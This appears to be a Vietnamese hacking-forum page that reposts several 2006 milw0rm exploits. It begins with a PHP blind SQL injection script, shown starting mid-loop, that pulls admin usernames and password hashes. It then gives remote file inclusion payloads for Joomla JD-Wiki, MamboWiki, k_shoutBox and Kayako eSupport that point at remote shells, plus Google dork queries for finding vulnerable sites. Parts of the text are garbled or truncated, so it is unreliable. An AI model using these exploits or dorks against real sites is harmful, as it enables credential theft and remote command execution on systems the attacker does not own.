black_hat_crHCE Joomla JD-Wiki Component... Code: require_once $subd.
Trang 1{
for ($i=0; $i<=255; $i++)
{
$sql="(SELECT(IF((ASCII(SUBSTRING(uname,$j,1))=".$i."),msg_time,subject)) FROM/**/".$prefix."users/**/WHERE/**/rank=7/**/and/**/level=5)/**/ASC/**/ LIMIT/**/1/*";
echo "sql -> ".$sql."\r\n";
$sql=urlencode($sql);
$packet ="GET ".$p."modules/messages/index.php?sort=$sql&by=suntzu
HTTP/1.0\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (!strstr($html,"111111111111111111111111")){$my_admin.=chr($i);echo
"admin -> ".$my_admin."[???]\n";sleep(1);break;}
if ($i==255) {die("Exploit failed ");}
}
$j++;
}
echo
" -\n";
echo "admin -> ".$my_admin."\n";
echo "password (md5) -> ".$my_password."\n";
echo
" -\n";
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($my_password)) {echo "Exploit succeeded ";}
else {echo "Exploit failed ";}
?>
Trang 2black_hat_cr(HCE)
Joomla JD-Wiki Component <= 1.0.2 Remote Include Vulnerability
Code:
##################################################################
##################
#JD-Wiki Remote File Include
-
JD-Wiki is the Joomla! integration of the nice DokuWiki
DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating documentation of any kind
-
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi
path: ?mosConfig_absolute_path=
xpl:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell
Contact: irc.undernet.org #hackbsd & #ircmasters
# milw0rm.com [2006-08-07]
vns3curity(HCE)
Joomla MamboWiki Component <= 0.9.4 Remote File Inclusion Vulnerability
Trang 3Tìm kiếm những site bị bug này với google:
Code:
inurl:"com_mambowiki"
file bị dzinh bug: MamboLogin.php
Xploit:
Code:
http://[sitepath]/[joomlapath]/components/com_mambowiki/MamboLogin.php?IP= http://huh?
black_hat_cr(HCE)
k_shoutBox <= 4.4 Remote File Inclusion Vulnerability
Code:
>>> Kurdish Security
>>> ShoutBox Remote Command Execution
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
>>> Rish : High
>>> Class : Remote
>>> Script : ShoutBox
>>> Site : http://www.knusperleicht.at
Code :
//**********************************************************
// INCLUDE PATH
define('SB_INCLUDE_PATH', $sb_include_path);
// INCLUDE PATH
Trang 4//**********************************************************
include SB_INCLUDE_PATH.'inc/config.inc.php';
require_once
SB_INCLUDE_PATH.'lang/'.SB_LANGUAGE.'/'.SB_LANGUAGE.'.lang.inc.php ';
require_once SB_INCLUDE_PATH.'inc/Sb_template.php';
require_once SB_INCLUDE_PATH.'inc/Sb_bbcode.php';
require_once SB_INCLUDE_PATH.'inc/Sb_stuff.php';
require_once SB_INCLUDE_PATH.'inc/Sb_database.php';
if(SB_INCLUDE_PATH == "") {
http://www.site.com/[path]/sb/index.php?sb_include_path=http://[site]/evilcode.txt
?&cmd=id
# milw0rm.com [2006-08-01]
vns3curity(HCE)
Kayako eSupport <= 2.3.1 (subd) Remote File Inclusion Vulnerability
Code:
Script: Kayako eSupport <= 2.3.1
Vendor: Kayako (www.kayako.com)
Discovered: beford <xbefordx gmail com>
Comments: It seems like the vendor silently fixed the issue in the
current version (more like since v2.3.5) withouth warning users of
previous versions, noobs Requires that "register_globals" is enabled
Vulnerable File: esupport/admin/autoclose.php
Trang 5Code:
require_once $subd "functions.php";
Not-leet-enough: "Powered By Kayako eSupport"
http://www.google.com/search?q=%22He port+v2.3.1%22
http://www.google.com/search?q=%22He upport+v2.2%22
POC: http://omghax.com/esupport/admin/aut //remotefile/?
# milw0rm.com [2006-08-02]
vns3curity(HCE)